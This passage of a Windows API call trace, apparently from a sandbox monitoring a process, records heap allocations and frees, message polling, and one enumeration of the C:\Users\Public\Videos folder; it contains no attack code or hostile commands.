RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0269.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0269.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0269.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0269.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0269.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0269.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0269.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.278] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0269.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0269.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0269.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0269.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0269.279] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0xa87550 [0269.279] FindNextFileW (in: hFindFile=0xa87550, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0269.279] FindNextFileW (in: hFindFile=0xa87550, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0269.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0269.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0269.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0269.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0269.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0269.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0269.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0269.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0269.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0269.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0269.279] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0269.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0269.279] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0269.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0269.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0269.279] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0269.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0269.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0269.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0269.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0269.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0269.280] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.280] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0269.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0269.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0269.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0269.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0269.280] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0269.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0269.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0269.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0269.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0269.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0269.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0269.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0269.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.281] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0269.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0269.281] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0269.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0269.281] FindNextFileW (in: hFindFile=0xa87550, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="踚@锴\x97\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0269.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0269.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0269.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0269.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0269.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0269.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0269.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0269.282] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0269.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0269.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0269.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0269.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0269.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0269.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0269.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0269.282] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0269.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0269.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0269.282] FindClose (in: hFindFile=0xa87550 | out: hFindFile=0xa87550) returned 1 [0269.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0269.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0269.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.283] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0269.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0269.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0269.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0269.283] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0269.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0269.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0269.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0269.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0269.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0269.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0269.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0269.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0269.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0269.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0269.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0269.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0269.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0269.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0269.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0269.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0269.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0269.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0269.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 